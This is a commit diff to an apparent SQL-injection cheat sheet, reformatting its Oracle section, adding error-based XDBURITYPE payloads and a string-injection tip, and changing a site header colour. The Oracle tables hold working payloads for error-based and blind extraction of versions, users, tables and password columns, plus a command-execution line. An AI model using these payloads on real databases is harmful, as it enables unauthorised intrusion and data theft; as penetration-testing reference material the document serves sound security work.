CSS - Update style color + Blind SQL Oracle

SQL Injection/OracleSQL Injection.md

@@ -42,6 +42,7 @@ SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
 SELECT version FROM v$instance;
 ```
 
+
 ## Oracle SQL Hostname
 
 ```sql
@@ -61,6 +62,7 @@ SELECT instance_name FROM V$INSTANCE;
 SELECT SYS.DATABASE_NAME FROM DUAL;
 ```
 
+
 ## Oracle SQL Database Credentials
 
 | Query                                   | Description               |
@@ -76,6 +78,7 @@ SELECT SYS.DATABASE_NAME FROM DUAL;
 SELECT DISTINCT owner FROM all_tables;
 ```
 
+
 ## Oracle SQL List Columns
 
 ```sql
@@ -83,6 +86,7 @@ SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
 SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo';
 ```
 
+
 ## Oracle SQL List Tables
 
 ```sql
@@ -91,27 +95,32 @@ SELECT owner, table_name FROM all_tables;
 SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
 ```
 
+
 ## Oracle SQL Error based
 
-| Description  | Query  |
+| Description           | Query          |
-| :------------- | :------------- |
+| :-------------------- | :------------- |
-| Invalid HTTP Request  | SELECT utl_inaddr.get_host_name((select banner from v$version where rownum=1)) FROM dual |
+| Invalid HTTP Request  | `SELECT utl_inaddr.get_host_name((select banner from v$version where rownum=1)) FROM dual` |
-| CTXSYS.DRITHSX.SN     | SELECT CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1)) FROM dual |
+| CTXSYS.DRITHSX.SN     | `SELECT CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1)) FROM dual` |
-| Invalid XPath         | SELECT ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user) FROM dual |
+| Invalid XPath         | `SELECT ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user) FROM dual` |
-| Invalid XML           | SELECT to_char(dbms_xmlgen.getxml('select "'||(select user from sys.dual)||'" FROM sys.dual')) FROM dual |
+| Invalid XML           | `SELECT to_char(dbms_xmlgen.getxml('select "'||(select user from sys.dual)||'" FROM sys.dual')) FROM dual` |
-| Invalid XML           | SELECT rtrim(extract(xmlagg(xmlelement("s", username || ',')),'/s').getstringval(),',') FROM all_users |
+| Invalid XML           | `SELECT rtrim(extract(xmlagg(xmlelement("s", username || ',')),'/s').getstringval(),',') FROM all_users` |
-| SQL Error             | SELECT NVL(CAST(LENGTH(USERNAME) AS VARCHAR(4000)),CHR(32)) FROM (SELECT USERNAME,ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) |
+| SQL Error             | `SELECT NVL(CAST(LENGTH(USERNAME) AS VARCHAR(4000)),CHR(32)) FROM (SELECT USERNAME,ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1))` |
+| XDBURITYPE getblob    | `XDBURITYPE((SELECT banner FROM v$version WHERE banner LIKE 'Oracle%')).getblob()` |
+| XDBURITYPE getclob    | `XDBURITYPE((SELECT table_name FROM (SELECT ROWNUM r,table_name FROM all_tables ORDER BY table_name) WHERE r=1)).getclob()` |
+
+When the injection point is inside a string use : `'||PAYLOAD--`
 
 
 ## Oracle SQL Blind
 
-| Description | Query |
+| Description              | Query          |
-| :------------- | :------------- |
+| :----------------------- | :------------- |
-| Version is 12.2	       | SELECT COUNT(*) FROM v$version WHERE banner LIKE 'Oracle%12.2%'; |
+| Version is 12.2	       | `SELECT COUNT(*) FROM v$version WHERE banner LIKE 'Oracle%12.2%';` |
-| Subselect is enabled	 | SELECT 1 FROM dual WHERE 1=(SELECT 1 FROM dual) |
+| Subselect is enabled	   | `SELECT 1 FROM dual WHERE 1=(SELECT 1 FROM dual)` |
-| Table log_table exists | SELECT 1 FROM dual WHERE 1=(SELECT 1 from log_table); |
+| Table log_table exists   | `SELECT 1 FROM dual WHERE 1=(SELECT 1 from log_table);` |
-| Column message exists in table log_table | SELECT COUNT(*) FROM user_tab_cols WHERE column_name = 'MESSAGE' AND table_name = 'LOG_TABLE'; |
+| Column message exists in table log_table | `SELECT COUNT(*) FROM user_tab_cols WHERE column_name = 'MESSAGE' AND table_name = 'LOG_TABLE';` |
-| First letter of first message is t | SELECT message FROM log_table WHERE rownum=1 AND message LIKE 't%'; |
+| First letter of first message is t | `SELECT message FROM log_table WHERE rownum=1 AND message LIKE 't%';` |
 
 
 ## Oracle SQL Time based
@@ -182,7 +191,8 @@ SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
 ## References
 
 * [NetSpi - SQL Wiki](https://sqlwiki.netspi.com/injectionTypes/errorBased/#oracle)
-* [ASDC12 - New and Improved Hacking Oracle From Web](https://owasp.org/www-pdf-archive/ASDC12-New_and_Improved_Hacking_Oracle_From_Web.pdf)
+* [ASDC12 - New and Improved Hacking Oracle From Web - OWASP](https://owasp.org/www-pdf-archive/ASDC12-New_and_Improved_Hacking_Oracle_From_Web.pdf)
 * [Pentesting Oracle TNS Listener - HackTricks](https://book.hacktricks.xyz/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener)
-* [ODAT: Oracle Database Attacking Tool](https://github.com/quentinhardy/odat/wiki/privesc)
+* [ODAT: Oracle Database Attacking Tool - quentinhardy](https://github.com/quentinhardy/odat/wiki/privesc)
-* [WebSec CheatSheet - Oracle](https://www.websec.ca/kb/sql_injection#Oracle_Default_Databases)
+* [WebSec CheatSheet - Oracle](https://www.websec.ca/kb/sql_injection#Oracle_Default_Databases)
+* [New payload to exploit Error-based SQL injection - Oracle database - Mannu Linux - 12/09/2023](https://www.mannulinux.org/2023/12/New-payload-to-exploit-Error-based-SQL-injection-Oracle-database.html)

custom.css

@@ -1,5 +1,5 @@
 .md-header{
-    background-color: #841F36;
+    background-color: #1f7884;
 }
 
 @media screen and (min-width: 790px) {